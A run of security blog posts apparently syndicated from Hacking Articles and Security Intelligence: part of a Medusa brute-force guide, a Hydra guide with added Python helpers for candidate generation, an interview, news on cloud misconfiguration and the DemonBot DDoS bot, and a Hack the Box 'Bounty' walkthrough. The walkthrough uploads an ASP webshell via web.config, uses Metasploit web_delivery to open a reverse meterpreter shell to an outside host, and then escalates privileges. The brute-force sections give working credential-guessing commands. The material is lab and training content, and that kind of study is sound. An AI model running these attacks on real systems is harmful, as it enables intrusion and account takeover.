  -u [TEXT]   : Username to test
  -U [FILE]   : File containing usernames to test
  -p [TEXT]   : Password to test
  -P [FILE]   : File containing passwords to test
  -C [FILE]   : File containing combo entries. See README for more information.
  -O [FILE]   : File to append log information to
  -e [n/s/ns] : Additional password checks ([n] No Password, [s] Password = Username)
  -M [TEXT]   : Name of the module to execute (without the .mod extension)
  -m [TEXT]   : Parameter to pass to the module. This can be passed multiple times with a different parameter each time and they will all be sent to the module (i.e. -m Param1 -m Param2, etc.)
  -d          : Dump all known modules
  -n [NUM]    : Use for non-default TCP port number
  -s          : Enable SSL
  -g [NUM]    : Give up after trying to connect for NUM seconds (default 3)
  -r [NUM]    : Sleep NUM seconds between retry attempts (default 3)
  -R [NUM]    : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.
  -c [NUM]    : Time to wait in usec to verify socket is available (default 500 usec).
  -t [NUM]    : Total number of logins to be tested concurrently
  -T [NUM]    : Total number of hosts to be tested concurrently
  -L          : Parallelize logins using one username per thread. The default is to process the entire username before proceeding.
  -f          : Stop scanning host after first valid username/password found.
  -F          : Stop audit after first valid username/password found on any host.
  -b          : Suppress startup banner
  -q          : Display module's usage information
  -v [NUM]    : Verbose level [0 - 6 (more)]
  -w [NUM]    : Error debug level [0 - 10 (more)]
  -V          : Display version
  -Z [TEXT]   : Resume scan based on map of previous scan

As said above, Medusa is a brute forcing tool; use the -d option to list every module it ships with.

Password Cracking For Specific Username

Medusa is a very effective tool and also quite easy to use for brute forcing any supported protocol.

Assume you want to crack the password for FTP (or any other service) and you already know the username, so you only want to run a password brute force attack, using a dictionary to guess the valid password.

In that case use the following command, where -u supplies the username and -P supplies the dictionary of passwords.

medusa -h 192.168.1.108 -u raj -P pass.txt -M ftp

As you can observe, it has found 1 valid password: 123 for username: raj for FTP login.

Username Cracking for Specific Password

Assume you want to crack the username for FTP (or any other service) and you already know the password, so you only want to run a username brute force attack, using a dictionary to guess the valid username. This is the reverse of the situation above.

In that case use the following command, where -U supplies the dictionary of usernames and -p supplies the password.

medusa -h 192.168.1.108 -U user.txt -p 123 -M ftp

As you can observe, it has found 1 valid username: raj for password: 123 for FTP login.

Cracking Login Credential

Suppose you want to crack both the username and the password for FTP (or any other service), running a brute force attack with a dictionary for each to guess the valid combination.

In that case use the following command, where -U supplies the dictionary of usernames and -P supplies the dictionary of passwords.

medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp

As you can observe, it has found 1 valid username: raj with password: 123 for FTP login.

Making Brute Force Attack on Multiple Host

If you want to use a user/pass dictionary against multiple hosts in a network, use the -H option, which takes a file of target hosts; Medusa will run the same dictionary attack, with the same number of login attempts, against each host IP listed in the file (-M still names the module to use).

Here you can observe I had saved two host IPs in a text file and then used the following command to brute force both hosts with the same dictionary.

medusa -H hosts.txt -U user.txt -P pass.txt -M ftp

As you can observe, it has found 2 valid FTP logins, one on each host.

If your host list is long and you want to control how many hosts are attacked at the same time, use -T, which sets the total number of hosts tested concurrently (it does not limit how many hosts are attacked in total; every host in the list is still processed).

medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -T 1
medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -T 2

As you can observe from the image below, the 1st command attacks one host at a time, whereas the 2nd attacks two hosts simultaneously.

Attacking on Specific Port Instead of Default

For security reasons, a network admin may move a service to a non-standard port. Medusa attacks the default port of a service, as you can observe in all the attacks above, where it automatically targeted port 21 for FTP login.

With the -n option you can specify a port number and launch the attack on that port instead of the default.

Suppose that while scanning the target network I found SSH running on port 2222 instead of 22; I would then execute the following commands for the SSH login attack.

medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ssh
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ssh -n 2222

As you can observe, the 1st command failed to connect to SSH because port 22 was closed, whereas the 2nd found 1 valid password: 123 for username: raj for SSH login on port 2222.

NULL/Same as Login Attempt

Using the -e option with ns adds two extra checks for every username on top of the password list: a null (empty) password and a password identical to the login name.

medusa -h 192.168.1.108 -u raj -P pass.txt -M ftp -e ns

As you can observe, for every username it tries the following combinations in addition to the password list:

User “raj” with password “” (null password)

User “raj” with password “raj” (same as login)

Save logs to Disk

For record keeping, better readability and future reference, we can save the output of the Medusa brute force attack to a file. For this we use Medusa's -O parameter (capital O; lowercase -o is not a Medusa option), which appends the log to the given file.

medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -O log.txt

Now that the command has run, let's check the location to make sure the output was saved to the file. In this case the output file is /root/log.txt.

Stop on Success 

Suppose you want to stop the brute force attack against a host as soon as the first valid username/password pair is found; then add the -f option to your command.

medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -f

When using a host list, you can instead use -F to stop the whole audit after the first valid username/password pair is found on any host.

medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -F

Suppress Startup Banner

If you want to hide Medusa's banner while running the brute force attack, use the -b option to suppress the startup banner.

medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -b

Verbose Mode

Verbose mode has six levels (-v 0 to 6) for examining the details of the attack, and there is a separate error debug option with ten levels (-w 0 to 10). Use -v for the verbosity level and -w for the error debug level.

medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -v 1
medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -v 2
medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -v 6

Error Debugging Mode

As said above, the error debug levels run from 0 to 10. In practice the output for levels 0-6 is approximately the same, with small differences, while levels 7-10 are approximately the same as each other but noticeably more detailed than 0-6.

medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -w 1
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -w 6
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -w 7

Debug mode shows the wait time, socket, sent and received data sizes, module details and module path.

 

Using Combo Entries

The -C option (capital C; lowercase -c is the socket wait time) takes a combo file. The combo file should have one record per line with colon-separated values in the format host:username:password. If any of the three fields is left blank, that information must be supplied either as a global value on the command line or as a list in a file (-h/-H, -u/-U, -p/-P).

The following combinations are possible in the combo file:

    host:username:password

    host:username:

    host::

    :username:password

    :username:

    ::password

    host::password

As you can observe in the image below, we have a userpass.txt file in combo format, and we can pass it with the -C option to launch the brute force attack.

medusa -M ftp -C userpass.txt
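To make the fill-in rule concrete, here is an added example, written for this page and not Medusa's own code, that parses combo lines of every form listed above and expands blank fields from global host, username and password lists, the way -h/-H, -u/-U and -p/-P fill them in alongside -C. The sample combo text and the global lists are constructed for illustration, and the function names are this example's own.

```python
from itertools import product

# Constructed sample combo file: one line for each of the seven forms the
# Medusa README lists. Not taken from a real engagement.
SAMPLE_COMBO = """\
192.168.1.108:raj:123
192.168.1.108:raj:
192.168.1.108::
:raj:123
:raj:
::123
192.168.1.108::123
"""


def parse_combo_line(line):
    """Split one combo entry into (host, username, password).

    Only the first two colons delimit fields, so a password may itself
    contain ':'. Blank fields come back as '' and are resolved by the caller.
    """
    parts = line.rstrip("\r\n").split(":", 2)
    if len(parts) != 3:
        raise ValueError(f"malformed combo entry: {line!r}")
    return tuple(parts)


def expand_combo(combo_text, hosts=(), users=(), passwords=()):
    """Yield every (host, username, password) triple the combo file implies.

    A blank field is filled from the corresponding global list, which is what
    -h/-H, -u/-U and -p/-P supply when used alongside -C. Blank lines are
    skipped. A blank field with no global value to fill it is an error rather
    than an attempt with an empty string (an empty password is what -e n is for).
    """
    for line in combo_text.splitlines():
        if not line.strip():
            continue
        host, user, pw = parse_combo_line(line)
        host_opts = [host] if host else list(hosts)
        user_opts = [user] if user else list(users)
        pw_opts = [pw] if pw else list(passwords)
        if not (host_opts and user_opts and pw_opts):
            raise ValueError(f"no global value to fill a blank field in {line!r}")
        yield from product(host_opts, user_opts, pw_opts)


def count_attempts(combo_text, hosts=(), users=(), passwords=()):
    """Number of login attempts a run with this combo file would make."""
    return sum(1 for _ in expand_combo(combo_text, hosts, users, passwords))


if __name__ == "__main__":
    # Globals stand in for -H hosts.txt / -U user.txt / -P pass.txt.
    hosts = ["192.168.1.108", "192.168.1.110"]
    users = ["raj", "root"]
    passwords = ["123", "toor"]
    for triple in expand_combo(SAMPLE_COMBO, hosts, users, passwords):
        print("%s:%s:%s" % triple)
    print("total attempts:", count_attempts(SAMPLE_COMBO, hosts, users, passwords))
```

With two global hosts, two users and two passwords, the seven sample lines expand to 1+2+4+2+4+4+2 = 19 attempts, which is worth knowing before a run against a service that locks accounts after a handful of failures.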

Resuming the Brute Force Attack

Sometimes a brute force attack gets paused, halted or cancelled accidentally. To save time, you can use the -Z option, which resumes the attack from the last attempt in the dictionary instead of starting again from the first.

medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp

In the image below you can observe that after pressing Ctrl-C the attack stops and Medusa prints a resume map; add the highlighted text to your command to resume the attack where it left off.

medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -Z h1u2u3.

Repeat the same again and compare the results of all three commands; you will notice it continued the brute force from the last attempt of the previous run.

medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -Z h1u3u4.

Author: Shubham Sharma is a Cyber security enthusiast and Researcher in the field of WebApp Penetration testing. Contact here

The post Comprehensive Guide on Medusa – A Brute Forcing Tool appeared first on Hacking Articles.

Comprehensive Guide on Hydra – A Brute Forcing Tool

Hello friends!! Today we are going to discuss how effective Hydra is at cracking the login credentials of various protocols in order to gain unauthorized remote access to a system. In this article we cover each option Hydra offers for running a brute force attack in various scenarios.

Table of Content

  • Introduction to hydra
  • Multiple Feature of Hydra
  • Password Guessing For Specific Username
  • Username Guessing For Specific Password
  • Cracking Login Credential
  • Use Verbose or Debug Mode for Examining Brute Force
  • NULL/Same as Login/Reverse login Attempt
  • Save Output to Disk
  • Resuming The Brute Force Attack
  • Password Generating Using Various Set of Character
  • Attacking on Specific Port Instead of Default
  • Making Brute Force Attack on Multiple Host

Introduction to Hydra

Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely.

It supports: Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

Multiple Feature of Hydra

Since we are using the GNOME build of Kali Linux, the "thc-hydra" package is already installed by default; all we need to do is open a terminal, type "hydra -h" and press Enter. You will be greeted by its help screen.

  -R                  : restore a previous aborted/crashed session
  -I                  : ignore an existing restore file
  -S                  : perform an SSL connect
  -s PORT             : if the service is on a different default port, define it here
  -l LOGIN or -L FILE : login with LOGIN name, or load several logins from FILE
  -p PASS or -P FILE  : try password PASS, or load several passwords from FILE
  -x MIN:MAX:CHARSET  : password bruteforce generation, type "-x -h" to get help
  -e nsr              : try "n" null password, "s" login as pass and/or "r" reversed login
  -u                  : loop around users, not passwords (effective! implied with -x)
  -C FILE             : colon separated "login:pass" format, instead of -L/-P options
  -M FILE             : list of servers to be attacked in parallel, one entry per line
  -o FILE             : write found login/password pairs to FILE instead of stdout
  -f / -F             : exit when a login/pass pair is found (-M: -f per host, -F global)
  -t TASKS            : run TASKS number of connects in parallel (per host, default: 16)
  -w / -W TIME        : wait time for responses (32s) / between connects per thread
  -4 / -6             : prefer IPv4 (default) or IPv6 addresses
  -v / -V / -d        : verbose mode / show login+pass for each attempt / debug mode
  -U                  : service module usage details
  server              : the target server (use either this OR the -M option)
  service             : the service to crack (see below for supported protocols)
  OPT                 : some service modules support additional input (-U for module help)

Reference Source: https://tools.kali.org/password-attacks/hydra

Password Guessing For Specific Username

Hydra is a very effective tool and also quite easy to use for brute forcing any supported protocol.

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server[:PORT][/OPT]]                                                                          

Suppose you want to crack the password for FTP (or any other service) and you already know the username, so you only want to run a password brute force attack, using a dictionary to guess the valid password.

In that case use the following command, where -l supplies the username and -P supplies the dictionary of passwords.

hydra -l raj -P pass.txt 192.168.1.108 ftp

As you can observe, it has found 1 valid password: 123 for username: raj for FTP login.

Username Guessing For Specific Password

Suppose you want to crack the username for FTP (or any other service) and you already know the password, so you only want to run a username brute force attack, using a dictionary to guess the valid username. This is the reverse of the situation above.

In that case use the following command, where -L supplies the dictionary of usernames and -p supplies the password.

hydra -L user.txt -p 123 192.168.1.108 ftp

As you can observe, it has found 1 valid username: raj for password: 123 for FTP login.

Cracking Login Credential

Suppose you want to crack both the username and the password for FTP (or any other service), running a brute force attack with a dictionary for each to guess the valid combination.

In that case use the following command, where -L supplies the dictionary of usernames and -P supplies the dictionary of passwords.

hydra -L user.txt -P pass.txt 192.168.1.108 ftp

As you can observe, it has found 1 valid username: raj with password: 123 for FTP login.

Use Verbose or Debug Mode for Examining Brute Force

You can add the -V option to any command; with verbose mode you can observe each attempt at matching a valid combination of username and password. If you look at the image below you will find there are 5 usernames in user.txt (L=5) and 5 passwords in pass.txt (P=5), hence the total number of login attempts is 5*5=25.

You can also use the -d option, which enables debug mode together with verbose output and shows the complete details of the attack.

As you can observe, verbose mode shows each attempt at matching a valid credential from user.txt and pass.txt, while debug mode additionally shows the wait time, conwait, socket, sent pid and received pid.

NULL/Same as Login/Reverse login Attempt

Using the -e option with nsr adds three extra checks for every login on top of the password list: a null password, a password equal to the login, and the login reversed. If you look at the image below you will notice that this time L=5 and P has automatically become 8, so the total number of login tries is 5*8=40.

hydra -L user.txt -P pass.txt 192.168.1.108 ftp -V -e nsr

As you can observe with every username, it is trying to match the following combination along with the password list.

Login “root” and pass “” as null password

Login “root” and pass “root” as same as login

Login “root” and pass “toor” as reverse of login
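The -e checks in Medusa (n and s, shown in the Medusa section above) and in Hydra (n, s and r, shown here) are the same idea, so here is one added example, not code from either tool, that covers both: it builds the extra candidates for a login, shows how they change the attempt count (5 logins and 5 passwords with -e nsr gives 5*8=40, matching the run above), and contrasts trying every password for one login before moving on with Hydra's -u ordering that cycles through the logins first, which is what you want when the target locks accounts after a few failures. The login and password lists are constructed samples and the function names are this example's own.

```python
# Constructed samples sized like the run in the article: 5 logins, 5 passwords.
LOGINS = ["root", "raj", "admin", "ftp", "guest"]
PASSWORDS = ["123", "password", "toor", "raj123", "letmein"]


def extra_candidates(login, flags):
    """Extra passwords -e adds for one login, in the order the flags are given.

    n -> empty password, s -> the login itself, r -> the login reversed.
    Medusa's -e only knows n and s; r is Hydra-specific. Unknown letters raise,
    mirroring the tools' rejection of a bad -e argument.
    """
    extras = []
    for flag in flags:
        if flag == "n":
            extras.append("")
        elif flag == "s":
            extras.append(login)
        elif flag == "r":
            extras.append(login[::-1])
        else:
            raise ValueError(f"unsupported -e flag {flag!r}")
    return extras


def login_attempts(logins, passwords, flags="", loop_users=False):
    """Yield (login, password) pairs in the order they would be tried.

    Default order is login-major: every candidate for the first login, then
    the next login. loop_users=True models Hydra's -u: the first candidate for
    every login, then the second for every login, which spreads attempts across
    accounts instead of hammering one account into a lockout.
    """
    per_login = [(login, extra_candidates(login, flags) + list(passwords))
                 for login in logins]
    if loop_users:
        width = max((len(cands) for _, cands in per_login), default=0)
        for i in range(width):
            for login, cands in per_login:
                if i < len(cands):
                    yield login, cands[i]
    else:
        for login, cands in per_login:
            for pw in cands:
                yield login, pw


def total_attempts(logins, passwords, flags=""):
    """Total attempts, i.e. len(logins) * (len(passwords) + len(flags))."""
    return sum(1 for _ in login_attempts(logins, passwords, flags))


if __name__ == "__main__":
    print("-e nsr extras for root:", extra_candidates("root", "nsr"))
    print("L=5, P=5, -e nsr ->", total_attempts(LOGINS, PASSWORDS, "nsr"), "tries")
    print("first four tries with -u:",
          list(login_attempts(LOGINS, PASSWORDS, "nsr", loop_users=True))[:4])
```

Note that a dictionary which already contains an empty line or the login name is not de-duplicated here, so the count is exactly the L*(P+3) the article derives from Hydra's banner.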

Save Output to Disk

For record keeping, better readability and future reference, we can save the output of the Hydra brute force attack to a file. For this we use Hydra's -o parameter, which writes the found login/password pairs to the given file.

hydra -L user.txt -P pass.txt 192.168.1.108 ftp -o result.txt

Now that the command has run, let's check the location to make sure the output was saved to the file. In this case the output file is /root/result.txt.

Resuming the Brute Force Attack

Sometimes a brute force attack gets paused, halted or cancelled accidentally. To save time, you can use the -R option, which restores the previous session and continues the brute force from the last attempt in the dictionary instead of starting again from the first.

hydra -L user.txt -P pass.txt 192.168.1.108 ftp
hydra -R

In the image below you can observe that after pressing Ctrl-C the attack stops; typing hydra -R then resumes the attack and continues it.

Password Generating Using Various Set of Character

Hydra has the -x option, which generates passwords instead of reading them from a file, with the following syntax:

-x MIN:MAX:CHARSET

MIN specifies the minimum number of characters in the password

MAX specifies the maximum number of characters in the password

CHARSET specifies the characters to use in the generation. Valid CHARSET values are: 'a' for lowercase letters, 'A' for uppercase letters, '1' for numbers, and for all other characters just add their literal representation.

-y disables the use of the above letters as placeholders, so they are taken literally.

Now suppose we want to try 123 as the password; for that I set MIN=1, MAX=3 and CHARSET=1 to generate numeric passwords for the given username, and run one of the following commands. Note that the last one adds -y, which makes the 1 in the charset literal, so it only generates passwords made of the digit 1 (1, 11, 111) and cannot produce 123.

hydra -l shubham -x 1:3:1 ftp://192.168.1.108
or
hydra -l raj -x 1:3:1 192.168.1.108 ftp
hydra -l raj -x 1:3:1 192.168.1.108 ftp -y

As you can observe it has found 1 valid password: 123 for username: raj for FTP login.

Now suppose we want to try abc as the password; for that I set MIN=1, MAX=3 and CHARSET=a to generate lowercase passwords for the given username, and run the following command.

hydra -l shubham -x 1:3:a ftp://192.168.1.108 -V

As you can observe it has found 1 valid password: abc for username: shubham for FTP login.
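Here is an added example, not Hydra's own code, that reproduces the -x MIN:MAX:CHARSET candidate space, including the a/A/1 placeholders and what -y does to them, so you can see how large a run will be before launching it. Hydra's exact enumeration order is not reproduced, only the set of candidates and its size; the function names are this example's own.

```python
import string
from itertools import product

# Placeholder letters Hydra accepts in CHARSET (treated literally with -y).
PLACEHOLDERS = {
    "a": string.ascii_lowercase,
    "A": string.ascii_uppercase,
    "1": string.digits,
}


def parse_x_spec(spec, literal=False):
    """Parse 'MIN:MAX:CHARSET' into (min_len, max_len, alphabet).

    literal=True models -y: 'a', 'A' and '1' are ordinary characters.
    Duplicate characters are dropped so '-x 1:3:aa' does not double-count.
    """
    try:
        lo, hi, charset = spec.split(":", 2)
        lo, hi = int(lo), int(hi)
    except ValueError:
        raise ValueError(f"bad -x spec {spec!r}, expected MIN:MAX:CHARSET") from None
    if lo < 1 or hi < lo or not charset:
        raise ValueError(f"bad -x spec {spec!r}: need 1 <= MIN <= MAX and a charset")
    alphabet = []
    for ch in charset:
        expansion = ch if literal else PLACEHOLDERS.get(ch, ch)
        for c in expansion:
            if c not in alphabet:
                alphabet.append(c)
    return lo, hi, "".join(alphabet)


def generate(spec, literal=False):
    """Yield every candidate password, shortest length first."""
    lo, hi, alphabet = parse_x_spec(spec, literal)
    for n in range(lo, hi + 1):
        for combo in product(alphabet, repeat=n):
            yield "".join(combo)


def candidate_count(spec, literal=False):
    """Size of the candidate space without enumerating it: sum of k**n."""
    lo, hi, alphabet = parse_x_spec(spec, literal)
    k = len(alphabet)
    return sum(k ** n for n in range(lo, hi + 1))


if __name__ == "__main__":
    print("-x 1:3:1    ->", candidate_count("1:3:1"), "candidates; 123 included:",
          "123" in generate("1:3:1"))
    print("-x 1:3:1 -y ->", list(generate("1:3:1", literal=True)))
    print("-x 1:3:a    ->", candidate_count("1:3:a"), "candidates")
    print("-x 1:3:a1   ->", candidate_count("1:3:a1"), "candidates")
```

-x 1:3:1 yields 10+100+1000 = 1110 candidates and contains 123; the same spec with -y yields only 1, 11 and 111. Adding a second placeholder grows the space quickly (1:3:a1 is 36+1296+46656 = 47988), which at FTP or SSH speeds is the difference between minutes and hours.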

Attacking on Specific Port Instead of Default

For security reasons, a network admin may move a service to a non-standard port. Hydra attacks the default port of a service, as you can observe in all the attacks above, where it automatically targeted port 21 for FTP login.

With the -s option you can specify a port number and launch the attack on that port instead of the default.

Suppose that while scanning the target network I found FTP running on port 2121 instead of 21; I would then execute the following command for the FTP login attack.

hydra -L user.txt -P pass.txt 192.168.1.108 ftp -s 2121

As you can observe, it has found 1 valid password: 123 for username: raj for FTP login.

Making Brute Force Attack on Multiple Host

If you want to use a user/pass dictionary against multiple hosts in a network, use the -M option, which takes a file of target hosts; Hydra will run the same dictionary attack, with the same number of login attempts, against each host IP listed in the file.

Here you can observe I had saved two host IPs in a text file and then used the following command to brute force both hosts with the same dictionary.

hydra -L user.txt -P pass.txt -M hosts.txt ftp

As you can observe, it has found 2 valid FTP logins, one on each host.

Suppose you have a list of multiple targets and want to finish the brute force attack as soon as a valid login is found for any host; then use the -F option, which stops the whole run when a valid credential is found on any host in the list (-f would only stop for that one host).

hydra -L user.txt -P pass.txt -M hosts.txt ftp -V -F

As you can observe, it has found 1 valid FTP login for 192.168.1.108 and finished the attack.

Disclaimer by Hydra – Please do not use in military or secret service organizations, or for illegal purposes.

Author: Shubham Sharma is a Technical writer, Researcher and Penetration tester contact here

The post Comprehensive Guide on Hydra – A Brute Forcing Tool appeared first on Hacking Articles.

A Day In The Life Of A Purple Teamer

Considering the ruthless tactics attackers will use to gain access to an organization’s assets, security professionals are now seeking to have both red and blue teaming skills. We asked Dimitrios Bougioukas, our training director, a few questions about the challenges and opportunities that come with being a purple teamer.

What are your main responsibilities as a Training Director & Purple Teamer?

My main responsibilities include directing eLearnSecurity’s course development activities, leading the IT security research endeavors of the company and constantly monitoring the threat landscape as well as the latest technology advancements in order to create new courses that cover new and emerging IT security segments.

What part of this job do you personally find most satisfying? Most challenging?

As a Training Director, my upper goal is to create the next generation of complete and up-to-date IT security professionals. We take our students’/clients’ education seriously and we strive towards providing the most practical and up-to-date IT security courses in the market. As you can imagine, when I see students passing our challenging exams and applying the knowledge they obtained to effectively secure their organization, it is the most fulfilling and satisfying feeling in the world. On the other hand, the most challenging part of my job is conducting IT security research, discovering new attack vectors, security bypasses etc. To do so, understanding the underpinnings and full capabilities of each technology is required and this is just the beginning. Countless attempts at trying to subvert each technology’s normal flow by supplying all kinds of imaginative input are also required and this is equally demanding.

What are the most important skills for Purple Teamers?

To become a purple teamer, you will have to be equally skilled at (web app, infrastructure, mobile, cloud) penetration testing and at incident response/threat hunting. Reverse engineering and/or information security management skills are also nice to have. Especially the information security management skills are of great importance, since in enterprise environments technical skills and skilled personnel are nothing without properly implemented IT security processes, planning, and management.

What jobs can you get with purple teaming skills?

To be honest, when you have mastered both Red and Blue team skills, the job possibilities are endless. And I don’t just mean that you can fill a penetration testing or an incident response/threat hunting position with ease. I mean that you will be in the position to even fill an IT security management position with minimum effort (of course some information security management and/or risk management skills will be required to do so).

What advice would you give to someone aspiring to become a successful purple teamer?

I am sure that you have figured out by now that becoming a Purple Teamer is a demanding endeavor. I would recommend being methodical, patient and passionate while developing your skillset. The danger of “educational fatigue” is high during this journey, so take it easy and enjoy every destination.

 


Enterprises Using IaaS or PaaS Have 14 Misconfigured Instances on Average, Cloud Adoption Study Finds

Enterprises using infrastructure-as-a-service (IaaS) or platform-as-a-service (PaaS) solutions have 14 misconfigured instances on average running at a given time.

A recent cloud adoption study by McAfee found that organizations have increased their usage of the cloud over time. The average number of cloud services in use per company grew from 1,682 in 2017 to 1,935 a year later. This growth was evident in both the number of enterprise cloud apps and consumer cloud apps.

But while organizations are increasingly turning to the cloud to satisfy their business needs, they aren’t taking the necessary steps to safeguard their cloud-based assets, the researchers observed. According to the report, some of the most common oversights involved inactive data encryption and unrestricted outbound access.

How Do Cloud Misconfigurations Put Data at Risk?

Cloud misconfigurations directly jeopardize organizations’ data. McAfee customers who turn on data loss prevention (DLP) discovered an average of 1,527 DLP incidents in their IaaS or PaaS storage per month. Overall, 27 percent of organizations using PaaS experienced a data theft incident affecting their cloud infrastructure.

Part of the problem is that no two cloud service providers (CSPs) offer the same security controls. Some CSPs even lack some of the most basic security measures. Just 8 percent of providers encrypted stored data at rest, for instance, while only 19.2 percent supported multifactor authentication (MFA).

How to Cope With Increasing Cloud Adoption

Security professionals can help their organizations stay protected amid increasing cloud adoption by embedding corporate security policies into contracts with CSPs. They should also consider conducting regular penetration tests to map their environments for vulnerabilities.

Sources: McAfee

The post Enterprises Using IaaS or PaaS Have 14 Misconfigured Instances on Average, Cloud Adoption Study Finds appeared first on Security Intelligence.

DemonBot Targeting Hadoop Clusters to Perform DDoS Attacks

A new bot called DemonBot is targeting Hadoop clusters to execute distributed denial-of-service (DDoS) attacks.

The Radware Threat Research Center recently observed a threat actor exploiting a Hadoop Yet Another Resource Negotiator (YARN) unauthenticated remote command execution. This method of attack enables the malicious agent to infect clusters of Hadoop, an open source distributed processing framework that helps big data apps run in clustered systems, with DemonBot. Upon successful infection, the threat connects to its command-and-control (C&C) server and transmits information about the infected device.

Why Cloud Infrastructure Servers Are Juicy Targets

The threat’s goal is to leverage infected cloud infrastructure servers to conduct DDoS attacks. At this juncture it is not exhibiting worm-like behavior akin to Mirai. Instead, it relies on 70 exploit servers for distribution, infrastructure that performs 1 million exploit attempts every day.

That being said, Radware found DemonBot to be binary-compatible with most Internet of Things (IoT) devices, which means the threat could spread to other types of products.

DemonBot isn’t the first bot to target cloud infrastructure servers like Hadoop clusters. In early October, a security researcher reported on Twitter that handlers of the Sora IoT botnet attempted to exploit the same YARN flaw abused by DemonBot.

Radware attributed the growing interest in Hadoop to the fact that cloud infrastructure servers allow bad actors to stage larger and more stable DDoS attacks using multiple vectors, such as User Datagram Protocol (UDP) and Transmission Control Protocol (TCP) floods.

How to Defend Against DemonBot

Security professionals can help protect their organizations against DemonBot by conducting a proper risk assessment on their cloud deployment. From there, they should enlist the help of penetration testers to map the vulnerabilities affecting their deployment.

Security teams should also look to invest in mitigation tools and services that specialize in defending against a DDoS attack.

Sources: Radware, Ankit Anubhav

The post DemonBot Targeting Hadoop Clusters to Perform DDoS Attacks appeared first on Security Intelligence.

Hack the Box: Bounty Walkthrough

Today we are going to solve another CTF challenge “Bounty”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Medium

Task: To find user.txt and root.txt file

Note: Since these labs are available online, they have a static IP. The IP of Bounty is 10.10.10.93

Walkthrough

Let’s start off with our basic nmap command to find the open ports and services.

nmap -A 10.10.10.93

Things to observe from its result: port 80 is open for HTTP, and the service banner is Microsoft-IIS/7.5.

Let’s navigate to port 80 through a web browser. Entering the IP in the URL bar brings up the web page shown in the image below.

Since the home page gave us no notable clue, we opted for the Dirbuster tool for directory enumeration, using the directory-list-2.3-medium.txt wordlist.

Hmm!! Here I received an HTTP response for the /transfer.aspx file and the /uploadedFiles directory.

When we browse to 10.10.10.93/transfer.aspx we are greeted by the web page shown below, which lets you upload a file.

We made many attempts to upload a file, but every time we got the message “Invalid File. Please try again”.

After so many efforts, I found this link on googling “IIS 7.5 rce upload”. Here we read about the web.config file, which plays an important role in storing IIS7 (and higher) settings. It is very similar to a .htaccess file in the Apache web server. Uploading a .htaccess file to bypass protections around uploaded files is a known technique.

So with the help of the link above we create a web.config file containing ASP code, which should respond by adding 1 and 2.

As you can observe, our web.config file is successfully uploaded into the /uploadedfiles/ directory.

When we request this file, it gives the expected response “3”, the sum of 1 and 2. Hence we can now place code in this file that gives us remote code execution (RCE).

Luckily!! I found this link for an ASP webshell: https://raw.githubusercontent.com/tennc/webshell/master/asp/webshell.asp. So I copied the whole content of the ASP webshell into our web.config file and uploaded it.

On executing the updated web.config file, it presents a form from which we can run commands. Here we will execute PowerShell code generated by Metasploit’s web_delivery module.

msf > use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set srvhost 10.10.14.2
msf exploit(multi/script/web_delivery) > set target 2
msf exploit(multi/script/web_delivery) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 10.10.14.2
msf exploit(multi/script/web_delivery) > run

Paste the code highlighted in the Metasploit image into the web shell’s text field and run it to get a meterpreter session.

Great!! We have a meterpreter session on the victim’s machine; now let’s find the user.txt file to finish this task.

We found the user.txt file inside /users/merlin/Desktop. Next we need to find the root.txt file to finish this challenge, and as we know, for that we need to escalate to root privileges.

Then I ran the post-exploitation module “Multi Recon Local Exploit Suggester”, which suggests local exploits that can be used from the meterpreter session. The exploits are recommended based on the architecture and platform of the session as well as the exploits available in Metasploit.

msf > use post/multi/recon/local_exploit_suggester
msf post(multi/recon/local_exploit_suggester) > set session 1
msf post(multi/recon/local_exploit_suggester) > exploit

Wonderful!! The Exploit Suggester proved itself by listing exploits to which the target is vulnerable. We will go with the first option, as highlighted in the image.

This vulnerability in Task Scheduler could allow elevation of privileges. The module has been tested on vulnerable builds of Windows Vista, Windows 7, and Windows Server 2008 x64 and x86.

msf > use exploit/windows/local/ms10_092_schelevator
msf exploit(windows/local/ms10_092_schelevator) > set lhost 10.10.14.2
msf exploit(windows/local/ms10_092_schelevator) > set lport 5555
msf exploit(windows/local/ms10_092_schelevator) > set session 1
msf exploit(windows/local/ms10_092_schelevator) > exploit

Another meterpreter session opens once the selected exploit has executed.

getsystem
getuid

